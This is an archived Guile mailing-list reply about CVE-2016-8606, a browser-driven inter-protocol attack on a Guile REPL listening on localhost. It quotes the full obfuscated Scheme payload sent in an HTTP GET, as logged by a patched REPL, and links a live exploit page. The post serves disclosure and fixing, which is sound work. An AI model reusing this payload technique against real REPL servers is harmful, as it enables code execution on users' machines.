From mboxrd@z Thu Jan  1 00:00:00 1970
Path: news.gmane.org!.POSTED!not-for-mail
From: Lizzie Dixon <_@lizzie.io>
Newsgroups: gmane.lisp.guile.devel,gmane.lisp.guile.user
Subject: Re: Guile security vulnerability w/ listening on localhost + port
	(with fix)
Date: Sun, 16 Oct 2016 18:39:30 -0700
Message-ID: <20161017013930.GA12121@lizzie.io>
References: <87k2dfc7dd.fsf@dustycloud.org> <20161014215551.GA31883@lizzie.io>
	<87lgxo9vx8.fsf@dustycloud.org>
NNTP-Posting-Host: blaine.gmane.org
Mime-Version: 1.0
Content-Type: multipart/signed; micalg=pgp-sha256;
	protocol="application/pgp-signature"; boundary="ew6BAiZeqk4r7MaW"
X-Trace: blaine.gmane.org 1476668412 20524 195.159.176.226 (17 Oct 2016 01:40:12 GMT)
X-Complaints-To: usenet@blaine.gmane.org
NNTP-Posting-Date: Mon, 17 Oct 2016 01:40:12 +0000 (UTC)
User-Agent: Mutt/1.6.0 (2016-04-01)
Cc: guile-user@gnu.org, guile-devel@gnu.org
To: Christopher Allan Webber <cwebber@dustycloud.org>
Original-X-From: guile-devel-bounces+guile-devel=m.gmane.org@gnu.org Mon Oct 17 03:40:05 2016
Return-path: <guile-devel-bounces+guile-devel=m.gmane.org@gnu.org>
Envelope-to: guile-devel@m.gmane.org
Original-Received: from lists.gnu.org ([208.118.235.17])
	by blaine.gmane.org with esmtp (Exim 4.84_2)
	(envelope-from <guile-devel-bounces+guile-devel=m.gmane.org@gnu.org>)
	id 1bvwuG-0003t8-NN
	for guile-devel@m.gmane.org; Mon, 17 Oct 2016 03:40:00 +0200
Original-Received: from localhost ([::1]:58396 helo=lists.gnu.org)
	by lists.gnu.org with esmtp (Exim 4.71)
	(envelope-from <guile-devel-bounces+guile-devel=m.gmane.org@gnu.org>)
	id 1bvwuI-0007MZ-P6
	for guile-devel@m.gmane.org; Sun, 16 Oct 2016 21:40:02 -0400
Original-Received: from eggs.gnu.org ([2001:4830:134:3::10]:48366)
	by lists.gnu.org with esmtp (Exim 4.71) (envelope-from <_@lizzie.io>)
	id 1bvwtw-0007MJ-FP
	for guile-devel@gnu.org; Sun, 16 Oct 2016 21:39:41 -0400
Original-Received: from Debian-exim by eggs.gnu.org with spam-scanned (Exim 4.71)
	(envelope-from <_@lizzie.io>) id 1bvwts-00035b-I6
	for guile-devel@gnu.org; Sun, 16 Oct 2016 21:39:40 -0400
Original-Received: from smtp81.iad3a.emailsrvr.com ([173.203.187.81]:38835)
	by eggs.gnu.org with esmtps (TLS1.0:DHE_RSA_AES_256_CBC_SHA1:32)
	(Exim 4.71) (envelope-from <_@lizzie.io>)
	id 1bvwts-000356-BJ; Sun, 16 Oct 2016 21:39:36 -0400
Original-Received: from smtp27.relay.iad3a.emailsrvr.com (localhost [127.0.0.1])
	by smtp27.relay.iad3a.emailsrvr.com (SMTP Server) with ESMTP id
	8CF49C04A2; Sun, 16 Oct 2016 21:39:32 -0400 (EDT)
X-Auth-ID: _@lizzie.io
Original-Received: by smtp27.relay.iad3a.emailsrvr.com (Authenticated sender:
	_-AT-lizzie.io) with ESMTPSA id D893CC048B; 
	Sun, 16 Oct 2016 21:39:31 -0400 (EDT)
X-Sender-Id: _@lizzie.io
Original-Received: from localhost (173-113-149-120.pools.spcsdns.net [173.113.149.120])
	(using TLSv1.2 with cipher AES256-GCM-SHA384)
	by 0.0.0.0:465 (trex/5.7.7); Sun, 16 Oct 2016 21:39:32 -0400
Content-Disposition: inline
In-Reply-To: <87lgxo9vx8.fsf@dustycloud.org>
X-detected-operating-system: by eggs.gnu.org: GNU/Linux 3.x
X-Received-From: 173.203.187.81
X-BeenThere: guile-devel@gnu.org
X-Mailman-Version: 2.1.21
Precedence: list
List-Id: "Developers list for Guile,
	the GNU extensibility library" <guile-devel.gnu.org>
List-Unsubscribe: <https://lists.gnu.org/mailman/options/guile-devel>,
	<mailto:guile-devel-request@gnu.org?subject=unsubscribe>
List-Archive: <http://lists.gnu.org/archive/html/guile-devel/>
List-Post: <mailto:guile-devel@gnu.org>
List-Help: <mailto:guile-devel-request@gnu.org?subject=help>
List-Subscribe: <https://lists.gnu.org/mailman/listinfo/guile-devel>,
	<mailto:guile-devel-request@gnu.org?subject=subscribe>
Errors-To: guile-devel-bounces+guile-devel=m.gmane.org@gnu.org
Original-Sender: "guile-devel" <guile-devel-bounces+guile-devel=m.gmane.org@gnu.org>
Xref: news.gmane.org gmane.lisp.guile.devel:18724 gmane.lisp.guile.user:12956
Archived-At: <http://permalink.gmane.org/gmane.lisp.guile.devel/18724>


--ew6BAiZeqk4r7MaW
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
Content-Transfer-Encoding: quoted-printable

Hi Christopher,

On 10/16, Christopher Allan Webber wrote:
> So, I guess this will work from a public site as well? =20

Yes! The HTML I mentioned in my post is available here:

<http://s3-us-west-2.amazonaws.com/blog.lizzie.io/exploiting-CVE-2016-8606-=
exploit.html>

(Though note that it won't work if you visit it over HTTPS, since
HTTPS documents aren't allowed to XHR to HTTP.)

If you visit it while a guile 2.0.13 repl is listening on 37146,
you'll see this:

    [lizzie@empress b.l.i]$ guile --listen
    GNU Guile 2.0.13
    Copyright (C) 1995-2016 Free Software Foundation, Inc.
   =20
    Guile comes with ABSOLUTELY NO WARRANTY; for details type `,show w'.
    This program is free software, and you are welcome to redistribute it
    under certain conditions; type `,show c' for details.
   =20
    Enter `,help' for help.
    scheme@(guile-user)>=20
    @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
    @@ POSSIBLE BREAK-IN ATTEMPT ON THE REPL SERVER                @@
    @@ BY AN HTTP INTER-PROTOCOL EXPLOITATION ATTACK.  See:        @@
    @@ <https://en.wikipedia.org/wiki/Inter-protocol_exploitation> @@
    @@ Possible HTTP request received: "GET /?(let((ascii(((lambda(x)x)reve=
rse)(((lambda(x)x)char-set-fold)((lambda(x)x)cons)(((lambda(x)x)make-list)(=
(lambda(x)x)0))((lambda(x)x)char-set:ascii)))))(((lambda(x)x)with-output-to=
-file)(((lambda(x)x)string)(((lambda(x)x)list-ref)((lambda(x)x)ascii)((lamb=
da(x)x)110))(((lambda(x)x)list-ref)((lambda(x)x)ascii)((lambda(x)x)111))(((=
lambda(x)x)list-ref)((lambda(x)x)ascii)((lambda(x)x)116))(((lambda(x)x)list=
-ref)((lambda(x)x)ascii)((lambda(x)x)101))(((lambda(x)x)list-ref)((lambda(x=
)x)ascii)((lambda(x)x)46))(((lambda(x)x)list-ref)((lambda(x)x)ascii)((lambd=
a(x)x)116))(((lambda(x)x)list-ref)((lambda(x)x)ascii)((lambda(x)x)120))(((l=
ambda(x)x)list-ref)((lambda(x)x)ascii)((lambda(x)x)116)))(lambda()(((lambda=
(x)x)display)(((lambda(x)x)string)(((lambda(x)x)list-ref)((lambda(x)x)ascii=
)((lambda(x)x)62))(((lambda(x)x)list-ref)((lambda(x)x)ascii)((lambda(x)x)58=
))(((lambda(x)x)list-ref)((lambda(x)x)ascii)((lambda(x)x)41))(((lambda(x)x)=
list-ref)((lambda(x)x)ascii)((lambda(x)x)10))))))) HTTP/1.1\r\nHost: localh=
ost:37146\r\nConnection: keep-alive\r\nOrigin: http://s3-us-west-2.amazonaw=
s.com\r\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KH=
TML, like Gecko) Chrome/53.0.2785.143 Safari/537.36\r\nAccept: */*\r\nRefer=
er: http://s3-us-west-2.amazonaws.com/blog.lizzie.io/exploiting-CVE-2016-86=
06-exploit.html\r\nAccept-Encoding: gzip, deflate, sdch\r\nAccept-Language:=
 en-US,en;q=3D0.8\r\n\r\n"
    @@ The associated socket has been closed.                      @@
    @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@


I don't recommend visiting it while a 2.0.12 repl is open, but it will
write a file in that case.

> I'm always a bit fuzzy about what browsers do and don't allow, but
> I'm stunned that a browser will let a request from some
> http://foo.example/ to http://localhost:37146/, even for just a GET.
> It seems like there are all sorts of daemons you can exploit that
> way.

It's a little absurd, yeah. :/ Maybe this string of exploits will
convince others to reconsider, but probably this kind of vulnerability
will be around for a while.

Thanks,

Lizzie.

--ew6BAiZeqk4r7MaW
Content-Type: application/pgp-signature; name="signature.asc"

-----BEGIN PGP SIGNATURE-----

iQEcBAEBCAAGBQJYBCvRAAoJEMwYhWkbKfpi5WAIAIk4z9rITRF7QV+8ZzDn43YY
mugd1h7uMIN0dNlgJiEapipKlHFFQHaNjzGnPmKTBPfq8TznyttJx/C3DtvuoqpU
sEkSk11lBu3iHOYWNiLrsZtGf9x6EWijRpurxuqwI7XEBMSuo58+EiVKH8WdWHoF
0AAfNAIDscn+5D2RJo31NmDkRaYGm+plSAzQxLiZP1/uWRtVAICNO+NCwykr7uvO
x35aIj5bMtfnyHYY6nGLTwCi5LcKziEhhXAxDMGZSuHOze/K2b0XNZYbmQPt72RC
J7LVjHENwgI9A7btgIPieG1ylZrvxZ66ZkhfY8KoMp4fx6lQ6HaDa5/50O1UmOw=
=Ob9J
-----END PGP SIGNATURE-----

--ew6BAiZeqk4r7MaW--